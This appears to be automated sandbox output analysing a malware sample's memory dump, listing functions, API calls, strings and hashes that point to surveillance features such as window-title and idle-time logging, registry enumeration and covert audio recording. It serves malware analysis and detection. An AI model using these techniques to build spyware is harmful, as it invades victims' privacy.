                              Function 00404077 Relevance: 49.2, APIs: 24, Strings: 4, Instructions: 150sleepCOMMON
                              Download Yara Rule
                              APIs
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 004040B5
                              • Sleep.KERNEL32(000001F4), ref: 004040CB
                              • GetForegroundWindow.USER32 ref: 004040CD
                              • GetWindowTextLengthA.USER32(00000000), ref: 004040D6
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000001,00000000,?), ref: 004040EB
                              • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004040FC
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00404106
                              • GetWindowTextA.USER32(00000000,00000000), ref: 0040410E
                              • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP60(?,00415748), ref: 0040411D
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 00404132
                              • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040413B
                              • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z.MSVCP60(-00000001), ref: 00404146
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(00000000,[ ,?, ]), ref: 00404165
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?, ]), ref: 0040416F
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?, ]), ref: 00404184
                              • Sleep.KERNEL32(000003E8,?,?,?,?,?, ]), ref: 004041C9
                              • _itoa.MSVCRT ref: 004041DB
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?, minutes },?,?,?,?,?,?,?,?,?,?,?,?, ]), ref: 004041FB
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,{ User has been idle for ,00000000,?,?,?,?,?,?,?,?,?,?,?,?, ]), ref: 0040420B
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00404215
                                • Part of subcall function 00403A9A: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,76F90F00,?,00405E64), ref: 00403AAD
                                • Part of subcall function 00403A9A: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,76F90F00,?,00405E64), ref: 00403AC0
                                • Part of subcall function 00403A9A: SetEvent.KERNEL32(00000000,?,00405E64), ref: 00403AC9
                                • Part of subcall function 00403A9A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(76F90F00,?,00405E64), ref: 00403AD8
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00404227
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00404230
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00404239
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?, ]), ref: 00404247
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$V?$basic_string@$D@2@@0@Hstd@@$??0?$basic_string@D@1@@V01@V01@@Window$?length@?$basic_string@SleepTextV10@V10@@Y?$basic_string@$??4?$basic_string@??8std@@?c_str@?$basic_string@?resize@?$basic_string@D@2@@0@0@EventForegroundLength_itoa
                              • String ID: [ ${ User has been idle for $ ]$ minutes }
                              • API String ID: 2152833798-3343415809
                              • Opcode ID: 16de867c107b42ae11ad0244138e34ded14529554952528baadd8620eb8bfb8a
                              • Instruction ID: 87bb5fb799bf3fa09b99bd2927ef5b1b1dfbc4c52e589369c19be6cb3ab50cf0
                              • Opcode Fuzzy Hash: 16de867c107b42ae11ad0244138e34ded14529554952528baadd8620eb8bfb8a
                              • Instruction Fuzzy Hash: 33517571900109AFDB10ABE0DC8DAEE7B78EB95314F04447AF601B31D1DB7899C5CB59
                              Function 0040926A Relevance: 47.4, APIs: 26, Strings: 1, Instructions: 194registryCOMMON
                              Download Yara Rule
                              APIs
                              • RegQueryInfoKeyA.ADVAPI32(004095BF,?,00000000,00000000,004095BF,?,?), ref: 004092D6
                              • RegEnumKeyExA.ADVAPI32(004095BF,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00409305
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00410EC8,?), ref: 0040931B
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,?,00000000), ref: 0040932D
                              • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,004095BF,00409BF5), ref: 0040933B
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,004095BF,00409BF5), ref: 00409344
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,004095BF,00409BF5), ref: 0040934D
                              • RegEnumValueA.ADVAPI32(004095BF,?,?,00003FFF,00000000,?,?,00002710), ref: 004093AD
                              • _itoa.MSVCRT ref: 004093C4
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00410EC8,?,?,004095BF,00409BF5), ref: 004093DD
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,?,00000000,?,004095BF,00409BF5), ref: 004093EF
                              • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,004095BF,00409BF5), ref: 004093FD
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,004095BF,00409BF5), ref: 00409406
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,004095BF,00409BF5), ref: 00409412
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00410EC8,?,?,?,?,?,004095BF,00409BF5), ref: 00409423
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,?,00000000,?,?,?,?,004095BF,00409BF5), ref: 00409432
                              • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,004095BF,00409BF5), ref: 00409440
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,004095BF,00409BF5), ref: 00409449
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,004095BF,00409BF5), ref: 00409455
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([regsplt],?,?,?,?,?,?,?,?,004095BF,00409BF5), ref: 0040946A
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000000,?,?,?,?,?,?,?,004095BF,00409BF5), ref: 00409485
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,004095BF,00409BF5), ref: 00409493
                              • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,004095BF,00409BF5), ref: 004094A1
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,004095BF,00409BF5), ref: 004094AD
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,004095BF,00409BF5), ref: 004094B9
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,004095BF,00409BF5), ref: 004094C5
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@D@1@@$D@2@@0@Hstd@@V01@V01@@V?$basic_string@Y?$basic_string@$V10@@$Enum$InfoQueryV10@0@Value_itoa
                              • String ID: [regsplt]
                              • API String ID: 1517376382-4262303796
                              • Opcode ID: 30431976b1ae715cd0fc3e13eb5c78d9e9581a0f57f9494c5079139dd48f7a99
                              • Instruction ID: f30101ecd5197dc84c436124cfbb1774ebe9f78b1b9e58743e63aaff6b42f93f
                              • Opcode Fuzzy Hash: 30431976b1ae715cd0fc3e13eb5c78d9e9581a0f57f9494c5079139dd48f7a99
                              • Instruction Fuzzy Hash: 0471E97290011EAFDB11DBA0DD89DEEB77CFB48304F0041B6E606E2151DB749E898F64
                              Function 00401528 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 132threadCOMMON
                              Download Yara Rule
                              APIs
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00401539
                              • closesocket.WS2_32 ref: 00401564
                              • ExitThread.KERNEL32 ref: 00401572
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000020,?,00415268,00000000), ref: 0040159E
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(004151D8,00000012,?,00415268,00000000), ref: 004015B4
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,playaudio,00415268,00000000), ref: 004015C5
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00000000), ref: 004015D2
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00000000), ref: 004015DF
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00000000), ref: 004015EC
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004015F9
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00401609
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00401615
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401621
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040162A
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401633
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040163C
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401645
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040164E
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401657
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401663
                              • waveInUnprepareHeader.WINMM(-0041519C,00000020), ref: 00401680
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004016A5
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004016EB
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$V10@0@$??0?$basic_string@$D@1@@$V01@@$??4?$basic_string@ExitHeaderThreadUnprepareV01@V10@@closesocketwave
                              • String ID: playaudio
                              • API String ID: 2056009259-1314764895
                              • Opcode ID: 3742e07a2a259b882a403f627092aaa57361fb2f085af106636733a191568580
                              • Instruction ID: 76c54256c40fbbf35d32c407d69db5079ebfec01750c77bb5de673180f13f9b1
                              • Opcode Fuzzy Hash: 3742e07a2a259b882a403f627092aaa57361fb2f085af106636733a191568580
                              • Instruction Fuzzy Hash: 2F416F72900109ABDB01EBA0ED4EADE777CFB55305F104176F506E21A1EE785E48CB68
                              Function 004022EA Relevance: 42.1, APIs: 28, Instructions: 149synchronizationthreadCOMMON
                              Download Yara Rule
                              APIs
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000000,00415A30,00000000), ref: 004022FC
                              • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00415258,00410668), ref: 00402314
                              • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00402323
                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040232D
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,00000000), ref: 00402346
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040234F
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 0040235D
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00415A60), ref: 0040236E
                              • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040238E
                              • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00415258,00410668), ref: 004023A6
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 004023B8
                              • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,0000000F,6A3F5E04), ref: 004023CE
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004023D8
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004023E1
                              • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,?), ref: 004023F2
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004023FC
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402405
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00402419
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 0040242F
                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0040243A
                              • CreateThread.KERNEL32(00000000,00000000,004022AD,00415A30,00000000,00000000), ref: 0040244B
                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00402456
                              • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,0040FC60,6A3F5E04), ref: 0040246B
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00402475
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040247E
                              • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00402487
                              • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00402499
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004024A7
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$V01@@$??4?$basic_string@V01@$??1?$basic_string@$?length@?$basic_string@?substr@?$basic_string@V12@$??0?$basic_string@??9std@@CreateD@2@@0@V?$basic_string@$?c_str@?$basic_string@?data@?$basic_string@?size@?$basic_string@D@1@@EventObjectSingleThreadWait
                              • String ID:
                              • API String ID: 2944316355-0
                              • Opcode ID: aad691de20132ca68f57e677d5fc682d1c060bbf91795a29eecf0d4de655ffa4
                              • Instruction ID: 8ff35d7655066902be5676fb1ff2957b2f75ed0f81b6480087796954eca2c198
                              • Opcode Fuzzy Hash: aad691de20132ca68f57e677d5fc682d1c060bbf91795a29eecf0d4de655ffa4
                              • Instruction Fuzzy Hash: 3E51FB7150020AEFCB049FA4ED9DDEE7F79FF44345B00816AF546A21A0DFB49989CB58
                              Function 004016F6 Relevance: 38.6, APIs: 18, Strings: 4, Instructions: 108COMMON
                              Download Yara Rule
                              APIs
                              • ??0?$basic_fstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(00401A91,00000022,00000001,?,00415160), ref: 00401710
                              • ?seekp@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@JW4seekdir@ios_base@2@@Z.MSVCP60(00000000,00000000,?,00415160), ref: 00401765
                              • ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(RIFF,00000004,?,00415160), ref: 0040177A
                              • ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(00401A91,00000004,?,00415160), ref: 0040178B
                              • ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(WAVE,00000004,?,00415160), ref: 0040179D
                              • ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(fmt ,00000004,?,00415160), ref: 004017AF
                              • ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(00000010,00000004,?,00415160), ref: 004017C0
                              • ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(?,00000002,?,00415160), ref: 004017D2
                              • ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(004151DA,00000002,?,00415160), ref: 004017E5
                              • ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(004151DC,00000004,?,00415160), ref: 004017F7
                              • ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(00000000,00000004,?,00415160), ref: 00401808
                              • ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(00401A91,00000002,?,00415160), ref: 0040181A
                              • ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(004151E6,00000002,?,00415160), ref: 0040182D
                              • ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(data,00000004,?,00415160), ref: 0040183F
                              • ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(?,00000004,?,00415160), ref: 00401850
                              • ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(?,?,?,00415160), ref: 00401861
                              • ?close@?$basic_fstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60(?,00415160), ref: 0040186D
                              • ??_D?$basic_fstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60(?,00415160), ref: 00401879
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: D@std@@@std@@U?$char_traits@$V12@$?write@?$basic_ostream@$??0?$basic_fstream@?close@?$basic_fstream@?seekp@?$basic_ostream@D?$basic_fstream@W4seekdir@ios_base@2@@
                              • String ID: RIFF$WAVE$data$fmt
                              • API String ID: 766087772-4212202414
                              • Opcode ID: 52a0db0d95ad37626374cffde14f3dfd6f79d3945ae441a7bf68ff1ddc81c4b6
                              • Instruction ID: d7aee1695a5c952c579fb531cba5a3b8ffd14c1b073e8637df3e8a3bae7d5bfd
                              • Opcode Fuzzy Hash: 52a0db0d95ad37626374cffde14f3dfd6f79d3945ae441a7bf68ff1ddc81c4b6
                              • Instruction Fuzzy Hash: A1410931A0121DEFDB24DB60DC4DFDA7B78FB59701F5080A9F156A20A0DBB05A84CF55
                              Function 004019AA Relevance: 38.6, APIs: 20, Strings: 2, Instructions: 96stringCOMMON
                              Download Yara Rule
                              APIs
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 004019BA
                              • time.MSVCRT ref: 004019D2
                              • localtime.MSVCRT ref: 004019DC
                              • strftime.MSVCRT ref: 004019F1
                              • puts.MSVCRT ref: 004019FE
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,.wav), ref: 00401A1A
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,004151A8,0000005C,00000000), ref: 00401A2C
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,00000000), ref: 00401A39
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,00000000), ref: 00401A46
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00401A52
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00000000), ref: 00401A5B
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00000000), ref: 00401A64
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00000000), ref: 00401A6D
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00000000), ref: 00401A76
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00415160,?,?,?,?,?,?,?,?,00000000), ref: 00401A85
                                • Part of subcall function 004016F6: ??0?$basic_fstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(00401A91,00000022,00000001,?,00415160), ref: 00401710
                                • Part of subcall function 004016F6: ?seekp@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@JW4seekdir@ios_base@2@@Z.MSVCP60(00000000,00000000,?,00415160), ref: 00401765
                                • Part of subcall function 004016F6: ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(RIFF,00000004,?,00415160), ref: 0040177A
                                • Part of subcall function 004016F6: ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(00401A91,00000004,?,00415160), ref: 0040178B
                                • Part of subcall function 004016F6: ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(WAVE,00000004,?,00415160), ref: 0040179D
                                • Part of subcall function 004016F6: ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(fmt ,00000004,?,00415160), ref: 004017AF
                                • Part of subcall function 004016F6: ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(00000010,00000004,?,00415160), ref: 004017C0
                                • Part of subcall function 004016F6: ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(?,00000002,?,00415160), ref: 004017D2
                                • Part of subcall function 004016F6: ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(004151DA,00000002,?,00415160), ref: 004017E5
                                • Part of subcall function 004016F6: ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(004151DC,00000004,?,00415160), ref: 004017F7
                                • Part of subcall function 004016F6: ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(00000000,00000004,?,00415160), ref: 00401808
                                • Part of subcall function 004016F6: ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(00401A91,00000002,?,00415160), ref: 0040181A
                                • Part of subcall function 004016F6: ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(004151E6,00000002,?,00415160), ref: 0040182D
